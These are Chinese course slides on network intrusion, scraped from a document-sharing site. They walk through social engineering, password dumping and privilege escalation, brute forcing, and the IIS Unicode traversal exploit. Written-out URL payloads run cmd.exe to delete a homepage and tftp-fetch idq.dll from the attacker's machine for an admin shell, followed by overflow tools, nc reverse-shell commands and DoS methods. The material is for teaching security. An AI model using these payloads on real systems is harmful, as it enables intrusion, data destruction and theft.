第3章网络入侵_第1页
第3章网络入侵_第2页
第3章网络入侵_第3页
第3章网络入侵_第4页
第3章网络入侵_第5页
已阅读5页,还剩81页未读 继续免费阅读

下载本文档

版权说明:本文档由用户提供并上传,收益归属内容提供方,若内容存在侵权,请进行举报或认领

文档简介

第三章网络入侵内容提要本章是攻击技术中最重要的一章,介绍目前常用的网络攻击手段:社会工程学攻击物理攻击暴力攻击利用Unicode漏洞攻击利用缓冲区溢出漏洞进行攻击等技术。并结合实际,介绍流行的攻击工具的使用以及部分工具的代码实现。3.1社会工程学攻击社会工程学是使用计谋和假情报去获得密码和其他敏感信息的科学,研究一个站点的策略其中之一就是尽可能多的了解这个组织的个体,因此黑客不断试图寻找更加精妙的方法从他们希望渗透的组织那里获得信息。举个例子:一组高中学生曾经想要进入一个当地的公司的计算机网络,他们拟定了一个表格,调查看上去显得是无害的个人信息,例如所有秘书和行政人员和他们的配偶、孩子的名字,这些从学生转变成的黑客说这种简单的调查是他们社会研究工作的一部分。利用这份表格这些学生能够快速的进入系统,因为网络上的大多数人是使用宠物和他们配偶名字作为密码。3.1社会工程学攻击目前社会工程学攻击主要包括两种方式:打电话请求密码和伪造Email1、打电话请求密码尽管不像前面讨论的策略那样聪明,打电话寻问密码也经常奏效。在社会工程中那些黑客冒充失去密码的合法雇员,经常通过这种简单的方法重新获得密码。2、伪造Email使用telnet一个黑客可以截取任何一个身份证发送Email的全部信息,这样的Email消息是真的,因为它发自于一个合法的用户。在这种情形下这些信息显得是绝对的真实。黑客可以伪造这些。一个冒充系统管理员或经理的黑客就能较为轻松的获得大量的信息,黑客就能实施他们的恶意阴谋。3.2物理攻击与防范物理安全是保护一些比较重要的设备不被接触。物理安全比较难防,因为攻击往往来自能够接触到物理设备的用户。3.2.1得到管理员密码用户登录以后,所有的用户信息都存储在系统的一个进程中,这个进程是:“winlogon.exe”,可以利用程序将当前登录用户的密码解码出来,如图5-1所示。案例5-1得到管理员密码使用FindPass等工具可以对该进程进行解码,然后将当前用户的密码显示出来。将FindPass.exe拷贝到C盘根目录,执行该程序,将得到当前用户得登录名,如图5-2所示。3.2.2权限提升有时候,管理员为了安全,给其他用户建立一个普通用户帐号,认为这样就安全了。其实不然,用普通用户帐号登录后,可以利用工具GetAdmin.exe将自己加到管理员组或者新建一个具有管理员权限的用户。案例5-2普通用户建立管理员帐号利用Hacker帐户登录系统,在系统中执行程序GetAdmin.exe,程序自动读取所有用户列表,在对话框中点击按钮“New”,在框中输入要新建的管理员组的用户名,如图5-5所示。输入一个用户名“IAMHacker”,点击按钮“确定”以后,然后点击主窗口的按钮“OK”,出现添加成功的窗口,如图5-6所示。3.3暴力攻击暴力攻击的一个具体例子是,一个黑客试图使用计算机和信息去破解一个密码。一个黑客需要破解一段单一的被用非对称密钥加密的信息,为了破解这种算法,一个黑客需要求助于非常精密复杂的方法,它使用120个工作站,两个超级计算机利用从三个主要的研究中心获得的信息,即使拥有这种配备,它也将花掉八天的时间去破解加密算法,实际上破解加密过程八天已是非常短暂的时间了。3.3.1字典文件字典攻击是最常见的一种暴力攻击。一次字典攻击能否成功,很大因素上决定与字典文件。一个好的字典文件可以高效快速的得到系统的密码。攻击不同的公司、不通地域的计算机,可以根据公司管理员的姓氏以及家人的生日,可以作为字典文件的一部分,公司以及部门的简称一般也可以作为字典文件的一部分,这样可以大大的提高破解效率。一个字典文件本身就是一个标准的文本文件,其中的每一行就代表一个可能的密码。目前有很多工具软件专门来创建字典文件,图5-8是一个简单的字典文件。3.3.2暴力破解操作系统密码字典文件为暴力破解提供了一条捷径,程序首先通过扫描得到系统的用户,然后利用字典中每一个密码来登录系统,看是否成功,如果成功则将密码显示案例5-3暴力破解操作系统密码比如使用图5-8所示的字典文件,利用上一章介绍的工具软件GetNTUser依然可以将管理员密码破解出来,如图5-9所示。3.3.3暴力破解邮箱密码案例5-4暴力破解邮箱密码邮箱的密码一般需要设置到八位以上,否则七位以下的密码容易被破解。尤其七位全部是数字,更容易被破解。案例5-4电子邮箱暴力破解破解电子邮箱密码,一个比较著名的工具软件是:黑雨——POP3邮箱密码暴力破解器,比较稳定的版本是2.3.1,主界面如图5-10所示。3.3.4暴力破解软件密码目前许多软件都具有加密的功能,比如Office文档、Winzip文档和Winrar文档等等。这些文档密码可以有效的防止文档被他人使用和阅读。但是如果密码位数不够长的话,同样容易被破解。案例5-5Office文档暴力破解

在对话框中选择选项卡“安全性”,在打开权限密码和修改权限密码的两个文本框中都输入“999”,如图5-12所示。保存并关闭该文档,然后再打开,就需要输入密码了,如图5-13所示。该密码是三位的,使用工具软件,AdvancedOfficeXPPasswordRecovery可以快速破解Word文档密码,主界面如图5-14所示。点击工具栏按钮“OpenFile”,打开刚才建立的Word文档,程序打开成功后会在LogWindow中显示成功打开的消息,如图5-15所示。设置密码长度最短是一位,最长是三位,点击工具栏开始的图标,开始破解密码,大约两秒钟后,密码被破解了,如图5-16所示。3.4Unicode漏洞专题(22-46页自学)通过打操作系统的补丁程序,就可以消除漏洞。只要是针对漏洞进行攻击的案例都依赖于操作系统是否打了相关的补丁。Unicode漏洞是2000-10-17发布的,受影响的版本:MicrosoftIIS5.0+MicrosoftWindows2000系列版本MicrosoftIIS4.0+MicrosoftWindowsNT4.0消除该漏洞的方式是安装操作系统的补丁,只要安装了SP1以后,该漏洞就不存在了。微软IIS4.0和5.0都存在利用扩展UNICODE字符取代"/"和"\"而能利用"../"目录遍历的漏洞。Unicode漏洞的检测方法使用扫描工具来检测Unicode漏洞是否存在,使用上一章介绍的X-Scan来对目标系统进行扫描,目标主机IP为:09,Unicode漏洞属于IIS漏洞,所以这里只扫描IIS漏洞就可以了,X-Scan设置如图5-17所示。Unicode漏洞的检测方法将主机添加到目标地址,扫描结果如图5-18所示。Unicode漏洞的检测方法可以看出,存在许多系统的漏洞。只要是/scripts开头的漏洞都是Unicode漏洞。比如:/scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir其中/scripts目录是IIS提供的可以执行命令的一个有执行程序权限的一个目录,在IIS中的位置如图5-19所示。Unicode漏洞的检测方法scripts目录一般系统盘根目录下的Inetpub目录下,如图5-20所示。Unicode漏洞的检测方法在Windows的目录结构中,可以使用两个点和一个斜线“../”来访问上一级目录,在浏览器中利用“scripts/../../”可以访问到系统盘根目录,访问“scripts/../../winnt/system32”就访问到系统的系统目录了,在system32目录下包含许多重要的系统文件,比如cmd.exe文件,可以利用该文件新建用户,删除文件等操作。浏览器地址栏中禁用符号“../”,但是可以使用符号“/”的Unicode的编码。比如“/scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir”中的“%c0%2f”就是“/”的Unicode编码。这条语句是执行dir命令列出目录结构。Unicode漏洞此漏洞从中文IIS4.0+SP6开始,还影响中文WIN2000+IIS5.0、中文WIN2000+IIS5.0+SP1,台湾繁体中文也同样存在这样的漏洞。在NT4中/编码为“%c1%9c”或者“%c1%9c”,WIN2000英文版是“%c0%af”。但从国外某些站点得来的资料显示,还有以下的编码可以实现对该漏洞的检测,该编码存在于日文版、韩文版等操作系统。%c1%pc%c0%9v%c0%qf%c1%8s%e0%80%af利用该漏洞读取出计算机上目录列表,比如读取C盘的目录,只要在浏览器中输入“09/scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir+c:\”利用Unicode漏洞读取系统盘目录利用Unicode漏洞读取系统盘目录利用语句得到对方计算机上装了几个操作系统以及操作系统的类型,只要读取C盘下的boot.ini文件就可以了。使用的语句是:09/scripts/..%c0%2f../winnt/system32/cmd.exe?/c+type+c:\boot.ini执行的结果如图5-22所示。利用Unicode漏洞删除主页利用Unicode可以方便的更改对方的主页,比如现在已经知道对方网站的根路径在“C:\Initpub\wwwroot”(系统默认)下,可以删除该路径下的文件“default.asp”来删除主页,这里的“default.asp”文件是IIS的默认启动页面。使用的语句是:09/scripts/..%c0%2f../winnt/system32/cmd.exe?/c+del+c:\inetpub\wwwroot\default.asp利用Unicode漏洞删除主页拷贝文件为了是使用方便,利用语句将cmd.exe文件拷贝到scripts目录,并改名为c.exe,使用的语句是:09/scripts/..%c0%2f../winnt/system32/cmd.exe?/c+copy+C:\winnt\system32\cmd.exe+c.exe程序执行结果如图5-24所示。

查看C盘的目录以后使用cmd.exe命令就方便了,比如查看C盘的目录,使用的语句就可以简化为:09/scripts/c.exe?/c+dir+c:\执行的结果如图5-25所示。利用Unicode漏洞入侵系统在地址栏上执行命令,用户的权限比较低,像net等系统管理指令不能执行。利用Unicode可以入侵对方的系统,并得到管理员权限。首先需要向对方服务器上传一些文件,入侵的第一步,建立tftp服务器,向对方的scripts文件夹传几个文件。需要上传一个名为“idq.dll”的文件,为了上传这个文件,首先在本地计算机上搭建一个TFTP服务器,普通文件传输协议TFTP(TextFileTransmissionProtocol)一般用来传输单个文件。使用工具软件tftpd32.exe建立服务器。将idq.dll和tftpd32.exe放在本地的同一目录下,执行tftpd32.exe程序,主界面如图5-26所示。利用Unicode漏洞入侵系统利用Unicode漏洞入侵系统这样在本地的TFTP的服务器就建立好了,保留这个窗口,通过该服务器向对方传递idq.dll文件。在浏览器中执行命令:“09/scripts/..%c0%2f../winnt/system32/cmd.exe?/c+tftp+-i+10+get+idq.dll”,命令其实是“tftp–i10getidq.dll”意思是从10服务器上获取idq.dll文件,执行成功的界面如图5-27所示。上载文件查看scripts目录上传完毕后可以查看一下scripts目录,是否真的上传成功了。如图5-28所示。入侵对方主机说明已经成功的在scripts目录中上传了一个idq.dll文件,下面使用工具软件ispc.exe入侵对方系统。拷贝ispc.exe文件到本地计算机的C盘根目录,在DOS命令行下执行命令:“ispc.exe09/scripts/idq.dll”,连接成功后就直接进入了对方的DOS命令行下,而且具有管理员权限,入侵的过程5-29所示。建立用户可以在对方计算机上做管理员可以做的一切事情,比如添加用户,建立一个用户名为“Hacker123”,密码也是“Hacker123”的用户,如图5-30所示。3.5其他漏洞攻击3.5.1利用打印漏洞利用打印漏洞可以在目标的计算机上添加一个具有管理员权限的用户。经过测试,该漏洞在SP2、SP3以及SP4版本上依然存在,但是不能保证100%入侵成功。使用工具软件:cniis.exe,使用的语法格式是:“cniis090”,第一个参数是目标的IP地址,第二参数是目标操作系统的补丁号,因为09没有打补丁,这里就是0。拷贝cniis.exe文件到C盘根目录,执行程序如图5-31所示。3.5.2SMB致命攻击SMB(SessionMessageBlock,会话消息块协议)又叫做NetBIOS或LanManager协议,用于不同计算机之间文件、打印机、串口和通讯的共享和用于Windows平台上提供磁盘和打印机的共享。SMB协议版本有很多种,在Windows98、WindowsNT、Windows2000和XP使用的是NTLM0.12版本。利用该协议可以进行各方面的攻击,比如可以抓取其他用户访问自己计算机共享目录的SMB会话包,然后利用SMB会话包登录对方的计算机。下面介绍利用SMB协议让对方操作系统系统重新启动或者蓝屏。案例5-9致命攻击使用的工具软件是:SMBDieV1.0,该软件对打了SP3、SP4的计算机依然有效,必须打专门的SMB补丁,软件的主界面如图5-32所示。攻击的时候,需要两个参数:对方的IP地址和对方的机器名,窗口中分别输入这两项,如图5-33所示。(22-46页自学)然后再点按钮“Kill”,如果参数输入没有错误的话,对方计算机立刻重启或蓝屏,命中率几乎100%,被攻击的计算机蓝屏界面如图5-34所示。3.6缓冲区溢出攻击目前最流行的一种攻击技术就是缓冲区溢出攻击。当目标操作系统收到了超过了它的最大能接收的信息量的时候,将发生缓冲区溢出。这些多余的数据将使程序的缓冲区溢出,然后覆盖了实际的程序数据,缓冲区溢出使目标系统的程序被修改,经过这种修改的结果使在系统上产生一个后门。最常见的手段是通过制造缓冲区溢出使程序运行一个用户shell,再通过shell执行其他命令,如果该shell有管理员权限,就可以对系统进行任意操作。这项攻击对技术要求比较高,但是攻击的过程却非常简单。缓冲区溢出原理很简单,比如程序:种植后门缓冲区溢出攻击voidfunction(char*szPara1){ charbuff[16]; strcpy(buffer,szPara1);}程序中利用strcpy函数将szPara1中的内容拷贝到buff中,只要szPara1的长度大于16,就会造成缓冲区溢出。存在strcpy函数这样问题的C语言函数还有:strcat()、gets()、scanf()等。3.6.1RPC漏洞溢出远程过程调用RPC(RemoteProcedureCall),是操作系统的一种消息传递功能,允许应用程序呼叫网络上的计算机。当系统启动的时候,自动加载RPC服务。可以在服务列表中看到系统的RPC服务,如图5-35所示。利用RPC漏洞建立超级用户(案例5-10)RPC溢出漏洞,对SP4也适用,必须打专用补丁。利用工具scanms.exe文件检测RPC漏洞,该工具是ISS安全公司2003年7月30日发布的,运行在命令行下用来检测指定IP地址范围内机器是否已经安装了“DCOMRPC接口远程缓冲区溢出漏洞(823980-MS03-026)”补丁程序。如果没有安装补丁程序,该IP地址就会显示出“[VULN]”。首先拷贝该文件到C盘根目录,现在要检查地址段09到10的主机,执行命令“scanms.exe09-10”,检查过程如图5-36所示。检查缓冲区溢出漏洞检查缓冲区溢出漏洞利用工具软件attack.exe对09进行攻击。攻击的结果将在对方计算机上建立一个具有管理员权限的用户,并终止了对方的RPC服务。新建用户的用户名和密码都是qing10,这样就可以登录对方计算机了,RPC服务停止操作系统将有许多功能不能使用,非常容易被管理员发现,使用工具软件OpenRpcSs.exe来给对方重启RPC服务。攻击的全过程如图5-37所示。在网络中隐身攻击的全过程3.6.2利用IIS溢出进行攻击案例5-11利用IIS溢出入侵系统利用软件SnakeIIS溢出工具可以让对方的IIS溢出,还可以捆绑执行的命令和在对方计算机上开辟端口,工具软件的主界面如图5-38所示。

该软件适用于各种类型的操作系统,比如对09进行攻击,09的操作系统的Windows2000,没有安装补丁程序,攻击完毕后,开辟一个813端口,并在对方计算机上执行命令“dirc:\”设置如图5-39所示。点击按钮“IDQ溢出”,出现攻击成功的提示框,如图5-40所示。这个时候,813端口已经开放,利用工具软件nc.exe连接到该端口,将会自动执行改才发送的DOS命令“dirc:\”,使用的语法是:nc.exe-vv09813,其中-vv是程序的参数,813是目标端口。可以看到命令的执行结果,如图5-41所示。下面利用nc.exe和snake工具的另外一种组合入侵对方计算机。首先利用nc.exe命令监听本地的813端口。使用的基本语法是“nc-l-p813”,执行的过程如图5-42所示。这个窗口就这样一直保留,启动工具软件snake,本地的IP地址是10,要攻击的计算机的IP地址是09,选择溢出选项中的第一项,设置IP为本地IP地址,端口是813,如图5-43所示。设置好以后,点击按钮“IDQ溢出”,程序显示对话框如图4-44所示。查看nc命令的DOS框,在该界面下,已经执行了设置的DOS命令。将对方计算机的C盘根目录列出来,如图4-45所示。3.6.3利用WebDav远程溢出(案例5-12)需要使用工具软件nc.exe和webdavx3.exe,首先在DOS命令行下执行webdavx3.exe,如果执行的话,该程序将提示已经过期了,如图4-46所示。修改本地系统时间到2001年,这样就可以攻击了,在命令后面直接跟对方的IP地址就可以了,现在要攻击的计算机是09,执行情况如图4-47所示。该程序不能自动退出,当发现程序长时间没有反映的时候,需要手工按下“CTRL+C”退出程序。该程序在对方的计算机上开了一个端口7788,依然可以nc.exe程序入侵对方的计算机,过程如图4-48所示。3.7拒绝服务攻击拒绝服务攻击的简称是:DoS(DenialofService)攻击,凡是造成目标计算机拒绝提供服务的攻击都称为DoS攻击,其目的是使目标计算机或网络无法提供正常的服务。最常见的DoS攻击是:计算机网络带宽攻击和连通性攻击。带宽攻击是以极大的通信量冲击网络,使网络所有可用的带宽都被消耗掉,最后导致合法用户的请求无法通过。连通性攻击指用大量的连接请求冲击计算机,最终导致计算机无法再处理合法用户的请求。3.7.1SYN风暴(SYNFlood)1996.“半连接”,任何连到网络上并提供基于TCP的网络服务(如www、FTP、邮件服务等)的主机都可遭受这种攻击利用TCP三次握手协议的缺陷回忆IP协议与TCP协议TCP协议的头结构(课本P36)和IP一样,TCP的功能受限于其头中携带的信息。因此理解TCP的机制和功能需要了解TCP头中的内容,表2-6显示了TCP头结构。来源端口(2字节)目的端口(2字节)序号(4字节)确认序号(4字节)头长度(4位)保留(6位)URGACKPSHRSTSYNPIN窗口大小(2字节)校验和(16位)紧急指针(16位)选项(可选)数据TCP协议的头结构(1)TCP源端口(SourcePort):16位的源端口包含初始化通信的端口号。源端口和IP地址的作用是标识报文的返回地址。(2)TCP目的端口(DestinationPort):16位的目的端口域定义传输的目的。这个端口指明报文接收计算机上的应用程序地址接口。(3)序列号(SequenceNumber):TCP连线发送方向接收方的封包顺序号。(4)确认序号(AcknowledgeNumber):接收方回发的应答顺序号。(5)头长度(HeaderLength):表示TCP头的双四字节数,如果转化为字节个数需要乘以4。(6)URG:是否使用紧急指针,0为不使用,1为使用。(7)ACK:请求/应答状态。0为请求,1为应答。(8)PSH:以最快的速度传输数据。(9)RST:连线复位,首先断开连接,然后重建。(10)SYN:同步连线序号,用来建立连线。(11)FIN:结束连线。如果FIN为0是结束连线请求,FIN为1表示结束连线。(12)窗口大小(Window):目的机使用16位的域告诉源主机,它想收到的每个TCP数据段大小。(13)校验和(CheckSum):这个校验和和IP的校验和有所不同,不仅对头数据进行校验还对封包内容校验。(14)紧急指针(UrgentPointer):当URG为1的时候才有效。TCP的紧急方式是发送紧急数据的一种方式。TCP协议的工作原理TCP提供两个网络主机之间的点对点通讯。TCP从程序中接收数据并将数据处理成字节流。首先将字节分成段,然后对段进行编号和排序以便传输。在两个TCP主机之间交换数据之前,必须先相互建立会话。TCP会话通过三次握手的完成初始化。这个过程使序号同步,并提供在两个主机之间建立虚拟连接所需的控制信息。TCP在建立连接的时候需要三次确认,俗称“三次握手”,在断开连接的时候需要四次确认,俗称“四次挥手”。TCP协议的三次“握手”

第一次“握手”

第一次握手:建立连接时,客户端发送syn包(syn=j)到服务器,并进入SYN_SENT状态,等待服务器确认;第二次“握手”

第二次握手:服务器收到syn包,必须确认客户的SYN(ack=j+1),同时自己也发送一个SYN包(syn=k),即SYN+ACK包,此时服务器进入SYN_RECV状态(半连接);第三次“握手”

第三次握手:客户端收到服务器的SYN+ACK包,向服务器发送确认包ACK(ack=k+1),此包发送完毕,客户端和服务器进入ESTABLISHED(TCP连接成功)状态,完成三次握手。TCP协议的四次“挥手”

需要断开连接的时候,TCP也需要互相确认才可以断开连接,四次交互过程如图2-16所示。3.7.1SYN风暴(SYNFlood)利用TCP三次握手协议的缺陷,攻击者向目标主机发送大量伪造源地址的TCPSYN报文,目标主机分配必要的资源,然后向源地址返回SYN+ACK包,并等待源端返回ACK包。由于源地址是伪造的,所以源端永远都不会返回ACK报文,受害主机继续发送SYN+ACK包,并将半连接放入端口的积压队列中虽然一般的主机都有超时机制和默认的重传次数,但由于端口的半连接队列的长度是有限的,如果不断的向受害主机发送大量的TCPSYN报文,半连接队列就会很快填满,服务器拒绝新的连接,将导致该端口无法响应其他机器进行的连接请求,最终使受害主机的资源耗尽。3.7.2Smurf攻击Smurf攻击是以最初发动这种攻击的程序名“Smurf”来命名的。这种攻击方法结合使用了IP欺骗和ICMP回复方法使大量网络传输充斥目标系统,引起目标系统拒绝为正常系统进行服务。Smurf攻击通过使用将回复地址设置成受害网络的广播地址的ICMP应答请求(ping)数据包,来淹没受害主机,最终导致该网络的所有主机都对此ICMP应答请求做出答复,导致网络阻塞。更加复杂的Smurf将源地址改为第三方的受害者,最终导致第三方崩溃3.7.3利用处理程序错误进行攻击故意错误地设定数据包头的一些重要字段。将这些错误的IP数据包发出去,使得接收端系统当机、挂起或崩溃,从而无法继续提供服务。如PingofDeath,Teardrop,Land攻击,Bonk攻击,Boink攻击以及OOB攻击等。3.8分布式拒绝服务攻击DDOS分布式拒绝服务攻击的特点是先使用一些典型的黑客入侵手段控制一些高带宽的服务器,然后在这些服务器上安装攻击进程,集数十台,数百台甚至上千台机器的力量对单一攻击目标实施攻击。在悬殊的带宽力量对比下,被攻击的主机会很快因不胜重负而瘫痪。分布式拒绝服务攻击技术发展十分迅速,由于其隐蔽性和分布性很难被识别和防御。常用攻击手段及防范措施如下第一,破坏物理设备。这些物理设备包括:计算机、路由器、电源、冷却设备、网络配线室等。防范这种破坏的主要措施有:例行检查物理实体的安全;使用容错和冗余网络硬件的方法,必要时迅速实现物理设备切换,从而保证提供正常的应用服务。第二,破坏配置文件。错误配置也会成为系统的安全隐患,这些错误配置常常发生在硬件装置、系统或应用程序中。如果攻击者侵入目标系统,更改了某些配置信息,目标系统很可能因配置不当而无法继续提供正常的服务。因此,管理员首先应该正确设置系统及相关软件的配置信息,并将这些敏感信息备份到安全介质上;利用工具的帮助及时发现配置文件的变化,并快速恢复这些配置信息保证系统和网络的正常运行。第三,利用网络协议或系统的设计弱点和实现漏洞。SYNflooding攻击即是利用TCP/IP协议的设计弱点,即建立连接时的三次握手协议和该过程中资源的非对称分配,及IP欺骗。若要从根本上克服这些弱点,需要重新设计协议层,加入更多的安全控制机制。若要在现有的网络构架中弥补这些弱点,可以采取半通明网关或主动监视技术。第四,消耗系统资源。系统资源包括CPU资源,内存资源,磁盘空间,网络带宽等,攻击者利用资源有限的特点,恶意消耗系统资源,使系统无法提供正常的服务。Smurf,DDoS等都属于该类型。随着攻击技术的日新月异,智能型协作型的攻击工具的不断开发,信息的可用性面临着更为严峻的考验。全球网络管理员要管理好自己的网络,可以采取下

温馨提示

  • 1. 本站所有资源如无特殊说明,都需要本地电脑安装OFFICE2007和PDF阅读器。图纸软件为CAD,CAXA,PROE,UG,SolidWorks等.压缩文件请下载最新的WinRAR软件解压。
  • 2. 本站的文档不包含任何第三方提供的附件图纸等,如果需要附件,请联系上传者。文件的所有权益归上传用户所有。
  • 3. 本站RAR压缩包中若带图纸,网页内容里面会有图纸预览,若没有图纸预览就没有图纸。
  • 4. 未经权益所有人同意不得将文件中的内容挪作商业或盈利用途。
  • 5. 人人文库网仅提供信息存储空间,仅对用户上传内容的表现方式做保护处理,对用户上传分享的文档内容本身不做任何修改或编辑,并不能对任何下载内容负责。
  • 6. 下载文件中如有侵权或不适当内容,请与我们联系,我们立即纠正。
  • 7. 本站不保证下载资源的准确性、安全性和完整性, 同时也不承担用户因使用这些下载资源对自己和他人造成任何形式的伤害或损失。

评论

0/150

提交评论